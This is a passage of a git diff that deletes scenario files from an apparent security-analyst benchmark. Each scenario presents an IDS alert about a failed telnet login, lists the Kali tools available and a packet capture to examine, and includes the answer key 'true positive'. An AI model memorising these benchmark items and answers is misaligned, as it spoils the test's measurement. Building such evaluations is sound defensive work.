5141a5b863fecf85f7f67dcd157a9f87837b3ea2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_17537.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_17537", - "alert_type": "True", - "alert_name": "dp_17537" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:56:05.310381 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:38028", - "alert": "01/01-23:56:05.310381 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:38028", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_17933.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_17933.json deleted file mode 100644 index e9c3b5dbddc34dd032b1623c05626860297719ff..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_17933.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_17933", - "alert_type": "True", - "alert_name": "dp_17933" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:58:05.254499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60676", - "alert": "01/01-23:58:05.254499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60676", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_18080.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_18080.json deleted file mode 100644 index f282eb9aa814d396eb1c2a9009dec70df4451d06..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_18080.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_18080", - "alert_type": "True", - "alert_name": "dp_18080" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T23:56:17.928738+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:37974", - "alert": "1970-01-01T23:56:17.928738+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:37974", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_19336.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_19336.json deleted file mode 100644 index 7feec91e5ec903adac899d24d7eddfdc4d136a0a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_19336.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_19336", - "alert_type": "True", - "alert_name": "dp_19336" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:04:11.203882 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56112", - "alert": "01/02-00:04:11.203882 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56112", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21007.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21007.json deleted file mode 100644 index 95234d848e9b4eca6b1e8d293e66a163aae1ddbf..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21007.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21007", - "alert_type": "True", - "alert_name": "dp_21007" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:01.794822 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "alert": "01/02-00:11:01.794822 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21013.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21013.json deleted file mode 100644 index c0d9b0dc36df7a926c60dedecb8cc0163e85fab9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21013.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21013", - "alert_type": "True", - "alert_name": "dp_21013" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:02.151488 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "alert": "01/02-00:11:02.151488 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21044.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21044.json deleted file mode 100644 index 33256598d7a809a7d062bfad9277286fb9fd020d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21044.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21044", - "alert_type": "True", - "alert_name": "dp_21044" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:11.248290 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40172", - "alert": "01/02-00:11:11.248290 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40172", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21056.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21056.json deleted file mode 100644 index 39756f6a54969374b47469ae849a6fcdce88b625..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21056.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21056", - "alert_type": "True", - "alert_name": "dp_21056" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:15.020584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47410", - "alert": "01/02-00:11:15.020584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47410", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21061.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21061.json deleted file mode 100644 index 63a4e354b16ab807249447bf76a0bb4b7fd0fca2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21061.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21061", - "alert_type": "True", - "alert_name": "dp_21061" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:17.164052 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47426", - "alert": "01/02-00:11:17.164052 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47426", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21086.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21086.json deleted file mode 100644 index 43751ca0fa50ea288cbfce7b65c055c6ff26544b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21086.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21086", - "alert_type": "True", - "alert_name": "dp_21086" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:23.569855 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47440", - "alert": "01/02-00:11:23.569855 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47440", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21099.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21099.json deleted file mode 100644 index 477d5415d04b310eae17679948e4b73e098ed7bb..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21099.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21099", - "alert_type": "True", - "alert_name": "dp_21099" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:28.060390 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51252", - "alert": "01/02-00:11:28.060390 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51252", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21131.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21131.json deleted file mode 100644 index 1091f70fcf5d80cd7d5ef8b36973c22d214884b1..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21131.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21131", - "alert_type": "True", - "alert_name": "dp_21131" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:36.989674 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55970", - "alert": "01/02-00:11:36.989674 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55970", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21145.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21145.json deleted file mode 100644 index 5a44ad63c33706c6a4a26bcf3dcf1d0c743e0b44..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21145.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21145", - "alert_type": "True", - "alert_name": "dp_21145" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:40.195119 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55996", - "alert": "01/02-00:11:40.195119 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55996", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21146.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21146.json deleted file mode 100644 index c5bcb0c14ee208d1f968c3c274279b6eb88bc442..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21146.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21146", - "alert_type": "True", - "alert_name": "dp_21146" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:40.214309 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56008", - "alert": "01/02-00:11:40.214309 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56008", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21152.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21152.json deleted file mode 100644 index 837616a58274876e84e6d5695c9aa7f24af16aa6..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21152.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21152", - "alert_type": "True", - "alert_name": "dp_21152" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:43.170977 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "alert": "01/02-00:11:43.170977 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21178.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21178.json deleted file mode 100644 index 8234ac83238942a7ba73f38e62fa8e053b84242d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21178.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21178", - "alert_type": "True", - "alert_name": "dp_21178" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:49.500172 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60266", - "alert": "01/02-00:11:49.500172 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60266", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21189.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21189.json deleted file mode 100644 index d8a8767f767cd27fef1a415067304c3e9b54a196..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21189.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21189", - "alert_type": "True", - "alert_name": "dp_21189" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:52.290981 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60278", - "alert": "01/02-00:11:52.290981 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60278", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21199.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21199.json deleted file mode 100644 index e1a3ef88e5071096b4b7dcad048c1b96d617f004..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21199.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21199", - "alert_type": "True", - "alert_name": "dp_21199" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:56.078080 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "alert": "01/02-00:11:56.078080 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21202.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21202.json deleted file mode 100644 index a7bc826dc46a0f7982b83429ccfed6eda12038ac..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21202.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21202", - "alert_type": "True", - "alert_name": "dp_21202" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:57.273669 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36326", - "alert": "01/02-00:11:57.273669 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36326", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21226.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21226.json deleted file mode 100644 index 9ae591ff29f1b4e8824645241c93a9557dce6ec1..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21226.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21226", - "alert_type": "True", - "alert_name": "dp_21226" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:03.535510 \"PROTOCOL-TELNET login incorrect\" {TCP} 